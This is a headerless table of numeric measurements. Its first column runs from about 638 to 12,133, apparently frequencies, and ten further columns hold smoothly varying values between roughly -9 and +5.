638.07,-0.81,-0.15,-0.81,-0.15,0.16,-0.07,0.10,-0.65,-0.65,-0.66
644.45,-0.86,-0.20,-0.85,-0.20,0.20,-0.08,0.07,-0.66,-0.65,-0.66
650.89,-0.89,-0.25,-0.89,-0.25,0.24,-0.08,0.04,-0.65,-0.65,-0.64
657.40,-0.92,-0.28,-0.92,-0.29,0.28,-0.09,0.02,-0.64,-0.64,-0.64
663.98,-0.94,-0.32,-0.93,-0.31,0.30,-0.10,-0.01,-0.64,-0.63,-0.62
670.62,-0.94,-0.32,-0.94,-0.32,0.32,-0.10,-0.04,-0.62,-0.62,-0.62
677.32,-0.93,-0.32,-0.93,-0.33,0.33,-0.11,-0.06,-0.60,-0.61,-0.61
684.10,-0.92,-0.32,-0.91,-0.32,0.32,-0.12,-0.09,-0.60,-0.59,-0.60
690.94,-0.89,-0.31,-0.89,-0.31,0.31,-0.12,-0.12,-0.58,-0.58,-0.58
697.85,-0.86,-0.28,-0.86,-0.29,0.29,-0.13,-0.15,-0.57,-0.58,-0.58
704.83,-0.83,-0.26,-0.83,-0.26,0.26,-0.14,-0.18,-0.57,-0.57,-0.57
711.87,-0.79,-0.22,-0.79,-0.22,0.22,-0.14,-0.20,-0.57,-0.57,-0.57
718.99,-0.74,-0.17,-0.74,-0.18,0.18,-0.15,-0.23,-0.56,-0.57,-0.57
726.18,-0.70,-0.13,-0.70,-0.13,0.13,-0.16,-0.26,-0.57,-0.57,-0.57
733.44,-0.65,-0.08,-0.65,-0.08,0.08,-0.17,-0.29,-0.57,-0.57,-0.57
740.78,-0.60,-0.03,-0.60,-0.03,0.03,-0.17,-0.32,-0.57,-0.57,-0.57
748.19,-0.55,0.03,-0.55,0.03,-0.02,-0.18,-0.35,-0.57,-0.57,-0.58
755.67,-0.51,0.09,-0.51,0.08,-0.07,-0.19,-0.38,-0.58,-0.58,-0.60
763.23,-0.47,0.14,-0.47,0.13,-0.12,-0.20,-0.40,-0.59,-0.59,-0.61
770.86,-0.45,0.17,-0.44,0.18,-0.17,-0.21,-0.43,-0.62,-0.61,-0.62
778.57,-0.42,0.22,-0.42,0.21,-0.21,-0.21,-0.46,-0.63,-0.63,-0.64
786.35,-0.40,0.25,-0.40,0.25,-0.26,-0.22,-0.49,-0.66,-0.66,-0.65
794.22,-0.38,0.30,-0.38,0.29,-0.30,-0.23,-0.52,-0.68,-0.68,-0.68
802.16,-0.36,0.33,-0.35,0.34,-0.35,-0.24,-0.55,-0.70,-0.70,-0.69
810.18,-0.32,0.39,-0.32,0.39,-0.39,-0.25,-0.58,-0.71,-0.71,-0.71
818.28,-0.29,0.44,-0.29,0.44,-0.44,-0.26,-0.61,-0.72,-0.73,-0.73
826.46,-0.26,0.49,-0.26,0.49,-0.48,-0.27,-0.64,-0.74,-0.74,-0.75
834.73,-0.23,0.54,-0.23,0.54,-0.53,-0.28,-0.67,-0.76,-0.76,-0.77
843.08,-0.20,0.58,-0.20,0.58,-0.58,-0.29,-0.70,-0.77,-0.78,-0.78
851.51,-0.18,0.62,-0.18,0.62,-0.62,-0.30,-0.73,-0.80,-0.80,-0.80
860.02,-0.15,0.66,-0.15,0.66,-0.67,-0.31,-0.75,-0.81,-0.81,-0.81
868.62,-0.12,0.71,-0.12,0.71,-0.71,-0.32,-0.78,-0.83,-0.83,-0.83
877.31,-0.09,0.75,-0.09,0.75,-0.75,-0.33,-0.81,-0.84,-0.84,-0.84
886.08,-0.06,0.79,-0.06,0.79,-0.80,-0.35,-0.84,-0.85,-0.85,-0.85
894.94,-0.03,0.83,-0.03,0.83,-0.84,-0.36,-0.87,-0.87,-0.86,-0.86
903.89,0.00,0.88,-0.00,0.88,-0.87,-0.37,-0.89,-0.87,-0.87,-0.88
912.93,0.02,0.92,0.02,0.92,-0.90,-0.39,-0.92,-0.88,-0.88,-0.90
922.06,0.03,0.94,0.03,0.95,-0.93,-0.40,-0.94,-0.90,-0.90,-0.91
931.28,0.04,0.97,0.04,0.96,-0.95,-0.41,-0.97,-0.91,-0.92,-0.93
940.59,0.03,0.97,0.03,0.97,-0.97,-0.43,-0.99,-0.94,-0.93,-0.94
950.00,0.02,0.97,0.03,0.97,-0.98,-0.45,-1.01,-0.96,-0.95,-0.95
959.50,0.02,0.98,0.02,0.97,-0.98,-0.46,-1.03,-0.96,-0.97,-0.96
969.09,0.01,0.98,0.01,0.98,-0.99,-0.48,-1.06,-0.98,-0.97,-0.97
978.78,0.01,0.99,0.01,0.99,-0.99,-0.50,-1.08,-0.98,-0.98,-0.98
988.57,0.01,1.01,0.01,1.00,-0.99,-0.51,-1.09,-0.98,-0.99,-1.00
998.46,0.00,1.00,0.00,1.00,-1.00,-0.53,-1.11,-1.00,-1.00,-1.00
1008.44,-0.01,1.00,-0.01,1.00,-1.01,-0.55,-1.13,-1.02,-1.01,-1.01
1018.53,-0.01,1.01,-0.01,1.01,-1.02,-0.57,-1.15,-1.03,-1.03,-1.02
1028.71,0.00,1.03,0.00,1.03,-1.04,-0.59,-1.16,-1.04,-1.04,-1.03
1039.00,0.02,1.06,0.02,1.06,-1.06,-0.62,-1.18,-1.04,-1.04,-1.04
1049.39,0.04,1.09,0.04,1.09,-1.08,-0.64,-1.19,-1.04,-1.05,-1.05
1059.88,0.06,1.12,0.06,1.12,-1.12,-0.66,-1.20,-1.05,-1.05,-1.06
1070.48,0.08,1.14,0.09,1.15,-1.15,-0.69,-1.21,-1.07,-1.06,-1.06
1081.19,0.12,1.19,0.12,1.18,-1.19,-0.72,-1.23,-1.07,-1.07,-1.07
1092.00,0.15,1.22,0.15,1.22,-1.23,-0.74,-1.24,-1.07,-1.07,-1.07
1102.92,0.18,1.26,0.19,1.26,-1.26,-0.77,-1.25,-1.08,-1.08,-1.08
1113.95,0.22,1.31,0.22,1.30,-1.30,-0.80,-1.26,-1.08,-1.08,-1.09
1125.09,0.25,1.34,0.25,1.34,-1.34,-0.83,-1.27,-1.09,-1.09,-1.09
1136.34,0.28,1.37,0.28,1.37,-1.37,-0.86,-1.28,-1.09,-1.08,-1.09
1147.70,0.31,1.39,0.31,1.39,-1.39,-0.90,-1.29,-1.08,-1.08,-1.08
1159.18,0.34,1.42,0.34,1.42,-1.41,-0.93,-1.30,-1.07,-1.07,-1.08
1170.77,0.35,1.44,0.35,1.44,-1.42,-0.97,-1.31,-1.07,-1.07,-1.09
1182.48,0.36,1.45,0.36,1.45,-1.43,-1.01,-1.32,-1.07,-1.07,-1.09
1194.30,0.35,1.44,0.35,1.44,-1.43,-1.05,-1.34,-1.08,-1.08,-1.09
1206.25,0.34,1.43,0.34,1.43,-1.43,-1.09,-1.35,-1.09,-1.09,-1.09
1218.31,0.32,1.41,0.33,1.41,-1.43,-1.14,-1.36,-1.11,-1.10,-1.09
1230.49,0.32,1.41,0.32,1.41,-1.43,-1.18,-1.38,-1.11,-1.11,-1.09
1242.80,0.33,1.43,0.33,1.43,-1.44,-1.23,-1.39,-1.11,-1.11,-1.10
1255.22,0.35,1.45,0.35,1.45,-1.45,-1.28,-1.41,-1.10,-1.10,-1.10
1267.78,0.37,1.47,0.37,1.47,-1.46,-1.33,-1.42,-1.09,-1.09,-1.10
1280.45,0.39,1.49,0.39,1.49,-1.48,-1.38,-1.44,-1.09,-1.09,-1.10
1293.26,0.41,1.51,0.42,1.51,-1.51,-1.44,-1.46,-1.10,-1.09,-1.10
1306.19,0.44,1.54,0.44,1.54,-1.54,-1.50,-1.48,-1.09,-1.10,-1.10
1319.25,0.47,1.57,0.47,1.56,-1.57,-1.56,-1.50,-1.09,-1.10,-1.10
1332.45,0.49,1.59,0.50,1.59,-1.60,-1.62,-1.52,-1.11,-1.10,-1.10
1345.77,0.53,1.62,0.54,1.63,-1.63,-1.69,-1.54,-1.10,-1.10,-1.09
1359.23,0.58,1.67,0.58,1.67,-1.67,-1.76,-1.57,-1.09,-1.09,-1.09
1372.82,0.63,1.72,0.63,1.71,-1.71,-1.82,-1.59,-1.08,-1.08,-1.09
1386.55,0.67,1.76,0.67,1.76,-1.75,-1.90,-1.62,-1.08,-1.08,-1.09
1400.41,0.71,1.80,0.71,1.80,-1.79,-1.97,-1.65,-1.08,-1.08,-1.09
1414.42,0.75,1.85,0.75,1.84,-1.84,-2.05,-1.68,-1.09,-1.09,-1.10
1428.56,0.79,1.88,0.79,1.88,-1.88,-2.12,-1.71,-1.09,-1.09,-1.09
1442.85,0.82,1.92,0.82,1.92,-1.92,-2.20,-1.75,-1.10,-1.10,-1.10
1457.28,0.86,1.97,0.86,1.97,-1.97,-2.28,-1.78,-1.11,-1.11,-1.11
1471.85,0.89,2.01,0.89,2.01,-2.02,-2.36,-1.82,-1.13,-1.13,-1.12
1486.57,0.93,2.07,0.93,2.07,-2.07,-2.44,-1.85,-1.14,-1.13,-1.14
1501.43,0.98,2.12,0.98,2.12,-2.12,-2.52,-1.89,-1.14,-1.14,-1.14
1516.45,1.04,2.18,1.04,2.18,-2.18,-2.60,-1.93,-1.14,-1.14,-1.14
1531.61,1.10,2.25,1.10,2.24,-2.24,-2.67,-1.97,-1.14,-1.14,-1.15
1546.93,1.15,2.31,1.15,2.30,-2.30,-2.75,-2.01,-1.15,-1.15,-1.16
1562.40,1.20,2.36,1.21,2.37,-2.37,-2.82,-2.05,-1.16,-1.16,-1.16
1578.02,1.26,2.43,1.26,2.43,-2.43,-2.89,-2.10,-1.17,-1.17,-1.17
1593.80,1.32,2.51,1.32,2.50,-2.50,-2.95,-2.14,-1.18,-1.18,-1.19
1609.74,1.38,2.57,1.38,2.58,-2.57,-3.01,-2.19,-1.19,-1.19,-1.19
1625.84,1.45,2.65,1.45,2.65,-2.65,-3.06,-2.23,-1.20,-1.20,-1.20
1642.10,1.52,2.73,1.52,2.73,-2.73,-3.11,-2.28,-1.21,-1.21,-1.21
1658.52,1.59,2.81,1.60,2.81,-2.82,-3.14,-2.32,-1.23,-1.22,-1.22
1675.10,1.67,2.90,1.67,2.90,-2.91,-3.17,-2.37,-1.23,-1.23,-1.23
1691.85,1.75,3.00,1.75,3.00,-3.00,-3.19,-2.42,-1.25,-1.25,-1.25
1708.77,1.82,3.09,1.82,3.09,-3.09,-3.20,-2.46,-1.27,-1.27,-1.27
1725.86,1.89,3.18,1.90,3.18,-3.18,-3.20,-2.50,-1.29,-1.29,-1.29
1743.12,1.97,3.27,1.97,3.27,-3.28,-3.19,-2.55,-1.31,-1.30,-1.30
1760.55,2.05,3.37,2.05,3.36,-3.37,-3.18,-2.59,-1.32,-1.32,-1.32
1778.15,2.12,3.45,2.11,3.45,-3.45,-3.15,-2.63,-1.33,-1.34,-1.33
1795.94,2.16,3.52,2.16,3.52,-3.52,-3.11,-2.67,-1.36,-1.36,-1.36
1813.90,2.20,3.58,2.21,3.59,-3.58,-3.07,-2.70,-1.38,-1.37,-1.38
1832.03,2.24,3.64,2.24,3.63,-3.63,-3.02,-2.73,-1.39,-1.39,-1.40
1850.36,2.27,3.67,2.26,3.67,-3.66,-2.96,-2.76,-1.39,-1.40,-1.40
1868.86,2.25,3.67,2.26,3.68,-3.66,-2.90,-2.79,-1.41,-1.41,-1.42
1887.55,2.23,3.66,2.23,3.66,-3.65,-2.83,-2.81,-1.42,-1.42,-1.43
1906.42,2.18,3.62,2.18,3.62,-3.61,-2.76,-2.83,-1.43,-1.43,-1.44
1925.49,2.12,3.55,2.13,3.56,-3.55,-2.69,-2.85,-1.42,-1.42,-1.43
1944.74,2.05,3.47,2.05,3.47,-3.46,-2.61,-2.86,-1.41,-1.41,-1.42
1964.19,1.95,3.36,1.95,3.35,-3.35,-2.53,-2.87,-1.40,-1.40,-1.41
1983.83,1.82,3.22,1.83,3.22,-3.22,-2.45,-2.87,-1.40,-1.40,-1.40
2003.67,1.69,3.07,1.69,3.08,-3.08,-2.37,-2.87,-1.39,-1.39,-1.38
2023.71,1.54,2.93,1.54,2.92,-2.92,-2.29,-2.86,-1.38,-1.38,-1.39
2043.94,1.37,2.75,1.37,2.75,-2.75,-2.22,-2.85,-1.38,-1.38,-1.38
2064.38,1.19,2.56,1.19,2.56,-2.56,-2.14,-2.84,-1.37,-1.37,-1.37
2085.03,1.00,2.37,1.01,2.37,-2.37,-2.06,-2.82,-1.37,-1.37,-1.37
2105.88,0.82,2.18,0.82,2.18,-2.17,-1.99,-2.79,-1.35,-1.35,-1.36
2126.94,0.63,1.98,0.63,1.98,-1.97,-1.92,-2.77,-1.34,-1.34,-1.35
2148.20,0.43,1.77,0.43,1.77,-1.77,-1.85,-2.74,-1.34,-1.34,-1.34
2169.69,0.22,1.57,0.22,1.56,-1.56,-1.79,-2.70,-1.34,-1.34,-1.35
2191.38,0.01,1.36,0.02,1.36,-1.36,-1.73,-2.66,-1.35,-1.35,-1.35
2213.30,-0.19,1.16,-0.18,1.16,-1.16,-1.67,-2.62,-1.35,-1.35,-1.35
2235.43,-0.37,0.98,-0.37,0.98,-0.97,-1.62,-2.58,-1.34,-1.35,-1.35
2257.78,-0.56,0.80,-0.56,0.80,-0.79,-1.56,-2.53,-1.35,-1.35,-1.36
2280.36,-0.73,0.65,-0.73,0.64,-0.63,-1.52,-2.49,-1.36,-1.36,-1.38
2303.17,-0.90,0.48,-0.90,0.48,-0.49,-1.48,-2.44,-1.38,-1.38,-1.38
2326.20,-1.04,0.35,-1.04,0.35,-0.36,-1.44,-2.39,-1.40,-1.40,-1.39
2349.46,-1.15,0.24,-1.15,0.25,-0.27,-1.41,-2.33,-1.42,-1.41,-1.39
2372.95,-1.22,0.19,-1.22,0.19,-0.20,-1.38,-2.28,-1.42,-1.42,-1.41
2396.68,-1.27,0.16,-1.27,0.15,-0.16,-1.35,-2.23,-1.43,-1.43,-1.43
2420.65,-1.29,0.15,-1.29,0.15,-0.15,-1.34,-2.17,-1.44,-1.44,-1.44
2444.86,-1.27,0.18,-1.27,0.18,-0.18,-1.32,-2.12,-1.45,-1.45,-1.45
2469.31,-1.21,0.24,-1.21,0.23,-0.24,-1.32,-2.07,-1.45,-1.45,-1.45
2494.00,-1.12,0.32,-1.12,0.32,-0.33,-1.32,-2.01,-1.45,-1.45,-1.44
2518.94,-0.99,0.44,-0.99,0.44,-0.46,-1.33,-1.96,-1.44,-1.44,-1.43
2544.13,-0.82,0.60,-0.82,0.60,-0.61,-1.35,-1.91,-1.43,-1.43,-1.42
2569.57,-0.62,0.78,-0.62,0.78,-0.79,-1.37,-1.86,-1.40,-1.40,-1.40
2595.27,-0.38,0.99,-0.38,0.98,-0.99,-1.41,-1.81,-1.37,-1.37,-1.37
2621.22,-0.13,1.20,-0.13,1.20,-1.21,-1.45,-1.76,-1.34,-1.34,-1.33
2647.43,0.15,1.44,0.16,1.45,-1.45,-1.51,-1.71,-1.30,-1.30,-1.29
2673.90,0.45,1.70,0.45,1.70,-1.70,-1.58,-1.66,-1.24,-1.25,-1.25
2700.64,0.76,1.96,0.76,1.96,-1.95,-1.67,-1.61,-1.18,-1.19,-1.20
2727.65,1.06,2.20,1.06,2.21,-2.19,-1.77,-1.57,-1.13,-1.13,-1.14
2754.93,1.36,2.45,1.36,2.44,-2.43,-1.89,-1.52,-1.07,-1.08,-1.09
2782.48,1.64,2.66,1.64,2.66,-2.66,-2.02,-1.48,-1.02,-1.02,-1.02
2810.30,1.91,2.86,1.92,2.87,-2.88,-2.17,-1.44,-0.96,-0.96,-0.95
2838.40,2.19,3.07,2.19,3.07,-3.07,-2.33,-1.40,-0.87,-0.88,-0.88
2866.79,2.44,3.25,2.44,3.24,-3.23,-2.51,-1.36,-0.79,-0.79,-0.81
2895.46,2.67,3.38,2.67,3.38,-3.37,-2.69,-1.32,-0.70,-0.70,-0.71
2924.41,2.87,3.49,2.87,3.49,-3.48,-2.88,-1.28,-0.60,-0.61,-0.62
2953.65,3.04,3.56,3.05,3.56,-3.55,-3.05,-1.25,-0.51,-0.51,-0.52
2983.19,3.20,3.60,3.20,3.60,-3.59,-3.21,-1.21,-0.39,-0.39,-0.40
3013.02,3.33,3.61,3.33,3.61,-3.60,-3.33,-1.18,-0.27,-0.27,-0.28
3043.15,3.44,3.59,3.44,3.59,-3.58,-3.40,-1.15,-0.14,-0.14,-0.15
3073.58,3.52,3.53,3.52,3.53,-3.52,-3.42,-1.11,-0.00,-0.00,-0.01
3104.32,3.57,3.44,3.57,3.44,-3.44,-3.37,-1.08,0.13,0.13,0.13
3135.36,3.60,3.32,3.60,3.32,-3.33,-3.26,-1.06,0.27,0.27,0.28
3166.72,3.61,3.19,3.61,3.19,-3.20,-3.09,-1.03,0.41,0.41,0.42
3198.38,3.59,3.04,3.60,3.04,-3.04,-2.89,-1.00,0.55,0.56,0.55
3230.37,3.57,2.88,3.56,2.87,-2.87,-2.65,-0.97,0.71,0.70,0.69
3262.67,3.51,2.69,3.50,2.68,-2.67,-2.41,-0.95,0.84,0.83,0.82
3295.30,3.41,2.46,3.42,2.47,-2.46,-2.16,-0.92,0.95,0.95,0.95
3328.25,3.31,2.24,3.31,2.24,-2.24,-1.91,-0.90,1.07,1.07,1.07
3361.53,3.19,2.00,3.19,2.00,-2.01,-1.68,-0.87,1.19,1.19,1.19
3395.15,3.07,1.77,3.07,1.77,-1.76,-1.46,-0.85,1.31,1.31,1.30
3429.10,2.93,1.52,2.93,1.52,-1.51,-1.26,-0.82,1.42,1.42,1.41
3463.39,2.78,1.28,2.78,1.27,-1.26,-1.08,-0.80,1.52,1.52,1.50
3498.03,2.62,1.01,2.63,1.01,-1.01,-0.91,-0.78,1.61,1.62,1.61
3533.01,2.49,0.76,2.49,0.76,-0.78,-0.76,-0.75,1.72,1.71,1.73
3568.34,2.36,0.53,2.36,0.53,-0.55,-0.63,-0.73,1.81,1.81,1.83
3604.02,2.25,0.33,2.26,0.33,-0.34,-0.51,-0.71,1.91,1.92,1.92
3640.06,2.18,0.15,2.18,0.14,-0.15,-0.40,-0.68,2.03,2.03,2.03
3676.46,2.12,-0.03,2.12,-0.03,0.02,-0.31,-0.66,2.14,2.14,2.15
3713.22,2.09,-0.17,2.10,-0.17,0.16,-0.22,-0.63,2.26,2.26,2.26
3750.36,2.10,-0.29,2.10,-0.29,0.28,-0.15,-0.61,2.38,2.38,2.39
3787.86,2.12,-0.38,2.12,-0.39,0.38,-0.08,-0.58,2.50,2.50,2.50
3825.74,2.17,-0.46,2.17,-0.45,0.45,-0.02,-0.55,2.62,2.62,2.63
3864.00,2.25,-0.50,2.25,-0.50,0.50,0.03,-0.52,2.75,2.75,2.75
3902.64,2.36,-0.52,2.36,-0.53,0.52,0.07,-0.49,2.88,2.89,2.88
3941.66,2.49,-0.53,2.49,-0.53,0.53,0.11,-0.46,3.02,3.02,3.02
3981.08,2.62,-0.53,2.62,-0.53,0.52,0.14,-0.43,3.15,3.15,3.15
4020.89,2.76,-0.51,2.76,-0.51,0.50,0.17,-0.40,3.27,3.27,3.27
4061.10,2.90,-0.47,2.90,-0.47,0.48,0.20,-0.36,3.38,3.38,3.37
4101.71,3.04,-0.42,3.04,-0.43,0.44,0.22,-0.33,3.48,3.48,3.46
4142.73,3.17,-0.39,3.17,-0.38,0.40,0.24,-0.29,3.57,3.57,3.56
4184.15,3.29,-0.34,3.29,-0.34,0.35,0.26,-0.25,3.64,3.64,3.63
4226.00,3.40,-0.30,3.40,-0.30,0.30,0.27,-0.21,3.70,3.70,3.70
4268.26,3.51,-0.26,3.51,-0.25,0.24,0.28,-0.17,3.76,3.75,3.77
4310.94,3.60,-0.20,3.60,-0.20,0.19,0.30,-0.13,3.79,3.79,3.80
4354.05,3.68,-0.14,3.69,-0.15,0.14,0.31,-0.08,3.82,3.83,3.82
4397.59,3.76,-0.09,3.76,-0.09,0.09,0.32,-0.04,3.86,3.85,3.85
4441.56,3.82,-0.05,3.82,-0.05,0.05,0.34,0.01,3.87,3.87,3.87
4485.98,3.87,-0.01,3.87,-0.02,0.02,0.35,0.06,3.89,3.89,3.88
4530.84,3.90,-0.00,3.91,0.01,-0.00,0.36,0.11,3.90,3.90,3.90
4576.15,3.93,0.03,3.93,0.02,-0.01,0.38,0.16,3.92,3.92,3.90
4621.91,3.94,0.02,3.93,0.01,-0.01,0.40,0.21,3.94,3.93,3.92
4668.13,3.92,-0.02,3.93,-0.01,0.02,0.42,0.26,3.94,3.95,3.94
4714.81,3.90,-0.06,3.91,-0.06,0.06,0.44,0.32,3.96,3.97,3.96
4761.96,3.88,-0.11,3.88,-0.11,0.12,0.47,0.37,4.00,3.99,3.99
4809.58,3.84,-0.18,3.84,-0.19,0.19,0.50,0.43,4.03,4.03,4.02
4857.67,3.78,-0.28,3.78,-0.28,0.28,0.54,0.49,4.07,4.07,4.06
4906.25,3.71,-0.39,3.71,-0.39,0.39,0.58,0.54,4.10,4.10,4.10
4955.31,3.64,-0.50,3.64,-0.50,0.51,0.62,0.60,4.15,4.15,4.14
5004.87,3.56,-0.63,3.57,-0.63,0.64,0.68,0.67,4.20,4.21,4.19
5054.91,3.49,-0.76,3.49,-0.77,0.77,0.73,0.73,4.27,4.26,4.25
5105.46,3.41,-0.91,3.41,-0.92,0.91,0.79,0.79,4.32,4.32,4.32
5156.52,3.32,-1.07,3.33,-1.06,1.05,0.86,0.86,4.37,4.38,4.39
5208.08,3.24,-1.20,3.24,-1.20,1.18,0.94,0.92,4.42,4.42,4.44
5260.16,3.17,-1.32,3.17,-1.32,1.30,1.02,0.99,4.48,4.47,4.49
5312.77,3.09,-1.43,3.09,-1.43,1.42,1.11,1.06,4.51,4.51,4.52
5365.89,3.02,-1.54,3.02,-1.54,1.53,1.21,1.13,4.55,4.55,4.56
5419.55,2.95,-1.63,2.95,-1.63,1.62,1.31,1.20,4.58,4.58,4.58
5473.75,2.89,-1.72,2.89,-1.72,1.72,1.43,1.28,4.61,4.61,4.61
5528.49,2.82,-1.80,2.82,-1.80,1.81,1.55,1.35,4.63,4.63,4.62
5583.77,2.74,-1.89,2.74,-1.90,1.91,1.68,1.43,4.65,4.65,4.63
5639.61,2.66,-2.00,2.65,-2.00,2.01,1.83,1.51,4.67,4.66,4.66
5696.00,2.56,-2.11,2.56,-2.11,2.12,1.98,1.59,4.68,4.68,4.67
5752.96,2.46,-2.24,2.45,-2.24,2.24,2.14,1.67,4.71,4.70,4.70
5810.49,2.36,-2.36,2.35,-2.37,2.38,2.31,1.75,4.74,4.72,4.72
5868.60,2.25,-2.50,2.23,-2.51,2.52,2.48,1.84,4.77,4.75,4.75
5927.28,2.13,-2.65,2.10,-2.66,2.67,2.66,1.93,4.80,4.76,4.78
5986.56,1.98,-2.82,1.95,-2.82,2.82,2.85,2.02,4.80,4.77,4.80
6046.42,1.83,-2.98,1.79,-2.98,2.98,3.03,2.12,4.81,4.76,4.81
6106.89,1.67,-3.14,1.61,-3.13,3.13,3.21,2.21,4.80,4.74,4.81
6167.96,1.51,-3.28,1.42,-3.28,3.29,3.39,2.31,4.80,4.71,4.79
6229.64,1.33,-3.44,1.22,-3.43,3.43,3.54,2.41,4.76,4.65,4.77
6291.93,1.14,-3.59,1.01,-3.57,3.57,3.68,2.51,4.71,4.58,4.73
6354.85,0.95,-3.73,0.78,-3.70,3.69,3.80,2.62,4.64,4.47,4.68
6418.40,0.76,-3.84,0.53,-3.80,3.79,3.89,2.72,4.56,4.33,4.60
6482.58,0.54,-3.97,0.27,-3.89,3.88,3.95,2.83,4.42,4.15,4.51
6547.41,0.31,-4.05,-0.02,-3.95,3.95,3.99,2.94,4.26,3.94,4.36
6612.88,0.06,-4.13,-0.33,-4.01,4.00,4.00,3.05,4.06,3.67,4.19
6679.01,-0.23,-4.20,-0.67,-4.04,4.03,3.99,3.16,3.80,3.35,3.97
6745.80,-0.56,-4.27,-1.03,-4.05,4.04,3.96,3.27,3.48,3.00,3.71
6813.26,-0.90,-4.30,-1.39,-4.04,4.02,3.92,3.39,3.12,2.64,3.40
6881.39,-1.27,-4.30,-1.73,-4.00,4.00,3.88,3.50,2.73,2.26,3.03
6950.21,-1.64,-4.29,-2.05,-3.95,3.95,3.83,3.61,2.32,1.91,2.65
7019.71,-2.03,-4.25,-2.33,-3.90,3.90,3.78,3.72,1.87,1.57,2.22
7089.91,-2.43,-4.20,-2.58,-3.84,3.85,3.74,3.83,1.42,1.27,1.77
7160.81,-2.83,-4.11,-2.79,-3.78,3.79,3.70,3.94,0.96,1.00,1.28
7232.41,-3.22,-3.98,-2.97,-3.72,3.73,3.66,4.04,0.51,0.76,0.76
7304.74,-3.62,-3.84,-3.11,-3.66,3.67,3.63,4.14,0.05,0.56,0.22
7377.79,-4.01,-3.69,-3.23,-3.62,3.62,3.61,4.23,-0.39,0.39,-0.32
7451.56,-4.40,-3.54,-3.33,-3.58,3.58,3.59,4.32,-0.82,0.25,-0.86
7526.08,-4.77,-3.37,-3.42,-3.54,3.54,3.57,4.40,-1.23,0.12,-1.40
7601.34,-5.15,-3.23,-3.50,-3.51,3.51,3.56,4.46,-1.64,0.01,-1.92
7677.35,-5.52,-3.10,-3.58,-3.48,3.48,3.56,4.53,-2.04,-0.09,-2.42
7754.13,-5.87,-2.97,-3.64,-3.46,3.46,3.55,4.58,-2.41,-0.19,-2.90
7831.67,-6.22,-2.87,-3.71,-3.44,3.44,3.55,4.61,-2.78,-0.27,-3.35
7909.98,-6.57,-2.82,-3.77,-3.42,3.42,3.56,4.64,-3.15,-0.35,-3.75
7989.08,-6.93,-2.82,-3.83,-3.41,3.41,3.56,4.66,-3.52,-0.43,-4.11
8068.98,-7.29,-2.86,-3.90,-3.39,3.40,3.57,4.66,-3.89,-0.50,-4.43
8149.67,-7.65,-2.96,-3.96,-3.39,3.39,3.57,4.65,-4.26,-0.57,-4.69
8231.16,-7.99,-3.09,-4.02,-3.38,3.38,3.58,4.63,-4.61,-0.64,-4.90
8313.47,-8.32,-3.29,-4.08,-3.37,3.37,3.58,4.59,-4.94,-0.71,-5.03
8396.61,-8.61,-3.52,-4.15,-3.37,3.37,3.59,4.54,-5.24,-0.78,-5.09
8480.57,-8.84,-3.76,-4.21,-3.37,3.37,3.60,4.49,-5.47,-0.84,-5.08
8565.38,-9.03,-4.01,-4.28,-3.37,3.37,3.60,4.42,-5.66,-0.91,-5.02
8651.03,-9.16,-4.27,-4.34,-3.36,3.36,3.60,4.34,-5.79,-0.98,-4.89
8737.54,-9.24,-4.53,-4.41,-3.36,3.36,3.60,4.26,-5.88,-1.04,-4.71
8824.92,-9.28,-4.81,-4.47,-3.36,3.36,3.60,4.16,-5.92,-1.11,-4.47
8913.17,-9.26,-5.07,-4.54,-3.36,3.36,3.60,4.06,-5.90,-1.18,-4.19
9002.30,-9.19,-5.32,-4.61,-3.36,3.36,3.60,3.96,-5.83,-1.25,-3.87
9092.32,-9.08,-5.52,-4.68,-3.35,3.35,3.59,3.85,-5.73,-1.32,-3.56
9183.25,-8.93,-5.67,-4.75,-3.35,3.35,3.58,3.74,-5.58,-1.40,-3.26
9275.08,-8.74,-5.78,-4.82,-3.35,3.35,3.57,3.63,-5.39,-1.47,-2.96
9367.83,-8.52,-5.84,-4.89,-3.34,3.34,3.56,3.51,-5.18,-1.54,-2.68
9461.51,-8.26,-5.82,-4.95,-3.34,3.34,3.54,3.40,-4.92,-1.62,-2.44
9556.12,-7.97,-5.71,-5.02,-3.33,3.34,3.52,3.29,-4.63,-1.69,-2.26
9651.68,-7.68,-5.55,-5.09,-3.33,3.33,3.50,3.17,-4.35,-1.76,-2.13
9748.20,-7.38,-5.34,-5.16,-3.32,3.33,3.48,3.06,-4.05,-1.83,-2.04
9845.68,-7.08,-5.07,-5.23,-3.32,3.32,3.45,2.95,-3.76,-1.91,-2.01
9944.14,-6.78,-4.77,-5.30,-3.31,3.31,3.42,2.84,-3.47,-1.99,-2.01
10043.58,-6.48,-4.44,-5.36,-3.31,3.30,3.39,2.74,-3.18,-2.07,-2.04
10144.02,-6.18,-4.08,-5.48,-3.29,3.28,3.36,2.64,-2.90,-2.20,-2.10
10245.46,-5.87,-3.69,-5.59,-3.26,3.26,3.32,2.54,-2.61,-2.33,-2.18
10347.91,-5.58,-3.33,-5.71,-3.24,3.24,3.28,2.44,-2.34,-2.47,-2.25
10451.39,-5.30,-2.98,-5.82,-3.21,3.21,3.24,2.35,-2.08,-2.61,-2.32
10555.91,-5.04,-2.66,-5.93,-3.18,3.19,3.20,2.26,-1.85,-2.75,-2.38
10661.46,-4.79,-2.37,-6.05,-3.16,3.16,3.15,2.17,-1.63,-2.89,-2.42
10768.08,-4.53,-2.07,-6.16,-3.13,3.13,3.10,2.09,-1.40,-3.04,-2.46
10875.76,-4.28,-1.82,-6.28,-3.10,3.10,3.05,2.01,-1.18,-3.18,-2.46
10984.52,-4.05,-1.60,-6.39,-3.06,3.06,3.00,1.94,-0.99,-3.33,-2.45
11094.36,-3.83,-1.40,-6.51,-3.03,3.03,2.95,1.87,-0.80,-3.48,-2.43
11205.31,-3.61,-1.23,-6.63,-2.99,2.99,2.90,1.80,-0.61,-3.63,-2.38
11317.36,-3.40,-1.03,-6.74,-2.96,2.96,2.84,1.74,-0.44,-3.78,-2.37
11430.53,-3.19,-0.83,-6.86,-2.92,2.92,2.78,1.68,-0.27,-3.93,-2.36
11544.84,-3.01,-0.65,-6.97,-2.88,2.88,2.73,1.62,-0.12,-4.09,-2.36
11660.29,-2.84,-0.44,-7.09,-2.84,2.84,2.67,1.56,0.01,-4.24,-2.40
11776.89,-2.69,-0.22,-7.21,-2.80,2.80,2.61,1.51,0.12,-4.40,-2.47
11894.66,-2.57,-0.04,-7.32,-2.76,2.76,2.55,1.47,0.19,-4.56,-2.53
12013.60,-2.47,0.18,-7.44,-2.72,2.72,2.48,1.42,0.25,-4.72,-2.65
12133.74,-2.40,0.38,-7.56,-2.67,2.67,2.42,1.38,0.28,-4.88,-2.78
